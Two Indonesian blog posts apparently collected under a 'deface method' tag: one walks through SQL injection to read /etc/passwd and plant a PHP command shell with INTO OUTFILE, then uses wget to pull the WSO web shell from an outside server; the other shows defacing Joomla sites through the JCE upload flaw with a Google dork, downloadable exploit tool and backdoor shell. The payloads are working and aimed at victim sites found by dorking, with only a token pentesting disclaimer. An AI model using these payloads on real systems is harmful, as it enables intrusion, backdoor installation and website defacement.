Tampilkan postingan dengan label metode deface. Tampilkan semua postingan
Tampilkan postingan dengan label metode deface. Tampilkan semua postingan

Metode Sql Injection Into Out File ( Upload Shell Tanpa Admin Login )

Metode SQL Injection Into Out File ( Upload Shell Tanpa Admin Login )

Seperti yang kita tau bahwa untuk menanam sebuah shell biasa nya kita harus login pada sebuah web kalau kita memakai teknik SQL Injection kecuali kalau kita memakai teknik kayak XSS, LFI/RFI atau exploit uploadify kaya wp-store atau csrf dimana kita dapat mengupload shell atau backdor kita tanpa hak saluran root didalam panel admin. Nah bagaimana kalau sqli yg notabene kita dipaksa harus hash password dan find admin page repot juga ya :'v apalagi udah dapet admin login tapi password gabisa di hash atau sebaliknya kadang disitu aku merasa duka :'v

Persiapan Injection
1. Koneksi internet
2. Target vuln SQLi
3. kopi

-Step One :

Kalau ketemu sasaran tambahin symbol ' semoga tau vuln atau kagak
Kalau vuln pribadi kita injek menyerupai biasa
1.  Cari jumlah kolom dengan order by
2. Cari angka bagus dengn union select

-Step Two :

Kita coba lihat /etc/passwd dengan cara menambahkan
load_file(/etc/passwd) pada di angka yang tertera ( Bisa Disebut No Togel )

Contoh : Localhost/archive.php?id=-1 union select 1,2,3,load_file(/etc/passwd),5--+

loh kok karenanya gak keluar /etc/passwd malah error

santai mari kita bypass
convert /etc/passwd ke hexadecimal

Hasilnya 2f6574632f706173737764 maka kita tambahkan 0x di depanya
0x2f6574632f706173737764

Contoh : Localhost/archive.php?id=-1 union select 1,2,3,load_file(0x2f6574632f706173737764),5--+

Seperti yang kita tau bahwa untuk menanam sebuah shell biasa nya kita harus login pada seb Metode SQL Injection Into Out File ( Upload Shell Tanpa Admin Login )

Kok cuman user root doang yang muncul..
" coba ctrl + u / view- source "

Seperti yang kita tau bahwa untuk menanam sebuah shell biasa nya kita harus login pada seb Metode SQL Injection Into Out File ( Upload Shell Tanpa Admin Login )

-Step Three
Lanjut ke tahap upload shell
pertama kita tanam cmd.php yang berfungsi untuk mengeksekusi command

Contoh : 
Localhost/archive.php?id=-1 uniOn SelEcT 1,'<?php system($_GET[cmd]);?>',3,4 into outfile "/home/webcouncil/public_html/cmd.php"--+
<?php system($_GET[cmd]);?> : Ini script untuk mengeksekusi command dari server

into outfile "/home/webcouncil/public_html/cmd.php" : ini perintah untuk menanam script tadi dengan nama file cmd.php di direktori public_html

loh kok dapat tau kalau pathnya /home/localhost/public_html/
ingat error di web tadi?

Contoh : " Warning: mysql_num_rows() expects parameter 3 to be resource, boolean given in /home/webcouncil/public_html/archive.php on line 12 "

Nah dari situ aku tau pathnya 
trus load url tadi dan karenanya malah error :

Contoh : 
Cannot execute a blank command in /home/localhost/cmd.php on line 1
Tenang aja cuma error tapi masih dapat kok 
kita coba cek localhost/cmd.php

Booms karenanya nanti memang blank tapi bukan 404 not found lo yaa
lalu kita coba sanksi command untuk upload shell

Contoh : localhost/cmd.php?cmd=[command]

Kita pakai wget untuk upload shell..
tapi shell harus berformat txt

Contoh : localhost/cmd.php?cmd=wget http://files.xakep.biz/shells/PHP/wso.txt

trus rename wso.txt menjadi wso.php

Contoh : localhost/cmd.php?cmd=mv wso.txt wso.php

Mungkin Segitu aja yang dapat dikasih sebelumnya terima kasih sudah membaca :'v jangan lupa mampir ke channel YT ku dan Subscribe ya :* KLIK DISINI

Seperti yang kita tau bahwa untuk menanam sebuah shell biasa nya kita harus login pada seb Metode SQL Injection Into Out File ( Upload Shell Tanpa Admin Login )


Sumber https://mrwho-404.blogspot.com/

Deface Metode Jce File Upload (Shell Upload)


Assalamualaikum Wr.Wb
Baiklah bertemu lagi dengan aku Mr.who
Terimakasih telah berkunjung ke web sederhanan ini. Hehe
Kali ini aku akan memperlihatkan tutorial Deface Metode JCE File Upload (Shell Upload)

Sebelum deface sebaiknya kita mempersiapkan alat dan bahan
-Shell Backdoor IndoXploit
-Script Deface (Saya rasa udah punya sendiri-sendiri)
-Tools JCE Full Version (Touch )
 https://drive.google.com/open?id=1fCFaYmIAoEPD3A_GK5ZiFrpKv0pMJAVg
 http://www95.zippyshare.com/v/5prZMYOm/file.html 
-Dork
 Inurl:"/index.option=com_jce"
1. Dorking di gogle ibarat biasa. Jangan lupa tambahkan site semoga sanggup yang vuln

2. Buka aplikasi yg kalian download tadi lalu pastekan site yang kalian dapat, Click start

3. Jika vuln. Maka akan ada file upload ibarat ni


4. Upload shell kalian
Akses shell locallhost.adewa/images/stories/nama_shell_kalian.php


Catatan. KAMI tidak pernah bertanggung jawab dengan apa yang kalian perbuat
Jika ada problem jangan pernah menyalakan website ini 
Tutor ini di buat untuk mengetest/pentester suatu website apakah web itu mempunyai bug apa enggak
Mungkin hanya itu kata kata yg sanggup aku ucapkan 

Sekian dan Terimakasih
Wassalamualaikum Wr.Wb

Sumber https://mrwho-404.blogspot.com/